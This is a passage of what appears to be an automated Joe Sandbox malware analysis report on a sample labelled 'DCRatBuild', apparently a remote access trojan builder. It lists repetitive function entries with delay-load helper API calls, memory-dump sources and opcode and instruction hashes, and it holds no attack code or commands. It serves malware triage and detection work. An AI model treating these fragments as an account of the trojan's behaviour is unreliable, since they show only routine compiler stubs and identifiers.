                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 0f86fad079c69e892c320c038640ab862629b52774f31426b9d909152fe7ae59
                                        • Instruction ID: 12b15f895c9fc63b5e2968f86d677302c95b00ea7b6269ff691d8cb146bd4d2f
                                        • Opcode Fuzzy Hash: 0f86fad079c69e892c320c038640ab862629b52774f31426b9d909152fe7ae59
                                        • Instruction Fuzzy Hash: 20B012E936D001BC322861283C1BE36021CD0C1F10331403FB45BC0442DB4C4C4D9031
                                        Function 0074DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 2b3e946775f88bf363b922cadfeaae2279b0c4b203b14b0308e43fd76fe49017
                                        • Instruction ID: 3140f3c579093417da7353ff7cbfb022999f0d9c18a929b8a9f8feeee284fa6e
                                        • Opcode Fuzzy Hash: 2b3e946775f88bf363b922cadfeaae2279b0c4b203b14b0308e43fd76fe49017
                                        • Instruction Fuzzy Hash: 3EB092E5268106BC222821142C1BC360218C081B10321412AB446D00429B494C8D9031
                                        Function 0074DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DC36
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: dc96e038468f7d9f1928a297ab4954a2d2388205f129c4e8add29e68ba5dfe48
                                        • Instruction ID: 2b31bf8c3a116c1cd93334bca27d12cec9ddeb82c344ee2b8f0223b15f073459
                                        • Opcode Fuzzy Hash: dc96e038468f7d9f1928a297ab4954a2d2388205f129c4e8add29e68ba5dfe48
                                        • Instruction Fuzzy Hash: 47B012E56AC101FC322C71047C26D36032CC0CAB10330852BB94AE0142F78C5C494031
                                        Function 0074DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DC36
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 27aad8cc4d2398ed1cb7576dc565fc55c9a7c31ea4742b69bd9a4a2fae71c5eb
                                        • Instruction ID: b9526ab29679c59490a8672d1a72bf61251e0efcbaa0b480972050bd12dcd619
                                        • Opcode Fuzzy Hash: 27aad8cc4d2398ed1cb7576dc565fc55c9a7c31ea4742b69bd9a4a2fae71c5eb
                                        • Instruction Fuzzy Hash: F7B012E56BD201FC362C71047C26D36032CC0C5B10330452BB54AE0152F78C5C494031
                                        Function 0074DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DC36
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 5c48f891e92c4d5c3949c93d3fdb4455e1c4decabb7a97bfae7b1d0823f9629c
                                        • Instruction ID: 936b9090e32da802b26353ad8b6ce0fab469e9157e1d46776512a0ca66123d6f
                                        • Opcode Fuzzy Hash: 5c48f891e92c4d5c3949c93d3fdb4455e1c4decabb7a97bfae7b1d0823f9629c
                                        • Instruction Fuzzy Hash: 50B012E56AC205FC322C31007E26C36032CC1C5B10331462BB546F0042B78C5C895031
                                        Function 0074D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: d1d3192d5d4ca73a44f1487b54586bfe68f7cee1cc9f8cc924900fc397036104
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: d1d3192d5d4ca73a44f1487b54586bfe68f7cee1cc9f8cc924900fc397036104
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        Function 0074D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 212b5c796866fa9973eb5beb2941c0ca8ae9417124cc5f2da1d42e03a5d44a48
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 212b5c796866fa9973eb5beb2941c0ca8ae9417124cc5f2da1d42e03a5d44a48
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        Function 0074D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 6e9b10525886b52b69f00afe37cd1674ac17bd746f8a50acc05b08f69b780e74
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 6e9b10525886b52b69f00afe37cd1674ac17bd746f8a50acc05b08f69b780e74
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        Function 0074D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 49b6d51cc148312df9bd59acd51d4f95c187459f4f2c739f0bab461a72fa4627
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 49b6d51cc148312df9bd59acd51d4f95c187459f4f2c739f0bab461a72fa4627
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        Function 0074D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 045135c3046373f0d89dfde3944f1581a97d94885aa7a65ac5df71cfcdf83c26
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 045135c3046373f0d89dfde3944f1581a97d94885aa7a65ac5df71cfcdf83c26
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        Function 0074D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 8184c6d7bdff944f2a468d296c4301c138fab328e6ac8c1d335c524397cd680e
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 8184c6d7bdff944f2a468d296c4301c138fab328e6ac8c1d335c524397cd680e
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        Function 0074D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 1380ac914e93e4cc66eae0023261ff0c5ebcbb0e0f2a154315e68c3c5a394a64
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 1380ac914e93e4cc66eae0023261ff0c5ebcbb0e0f2a154315e68c3c5a394a64
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        Function 0074D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 4e8a140dca09c439819a7647d8f86f007a6478ded2c88fad42936ce6e1888148
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 4e8a140dca09c439819a7647d8f86f007a6478ded2c88fad42936ce6e1888148
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        Function 0074D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 339873a8aa32d2d91f7355035ef9e24b92bad97c1cf6c3195aeee1b5c1aca6ce
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 339873a8aa32d2d91f7355035ef9e24b92bad97c1cf6c3195aeee1b5c1aca6ce
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        Function 0074D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9bc6a13d9b95e8832314f179a0c8491d56c043c258a68f501eec43c5e2de2798
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 9bc6a13d9b95e8832314f179a0c8491d56c043c258a68f501eec43c5e2de2798
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        Function 0074D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f50a180c8a3be34574d3e7ea34c5290f78632db21768c291364bc348d52633c7
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: f50a180c8a3be34574d3e7ea34c5290f78632db21768c291364bc348d52633c7
